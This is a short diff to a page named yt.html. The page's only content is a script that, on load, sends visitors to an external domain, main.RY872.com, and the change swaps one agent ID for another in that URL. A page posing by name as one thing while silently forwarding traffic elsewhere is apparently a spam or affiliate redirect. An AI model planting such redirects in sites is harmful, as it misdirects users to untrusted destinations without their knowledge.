--- a/yt.html
+++ b/yt.html
@@ -1,3 +1,3 @@
 <script>
-  window.location.href="https://main.RY872.com/?AgentId=120840051587452055"
+  window.location.href="https://main.RY872.com/?AgentId=202048"
 </script>
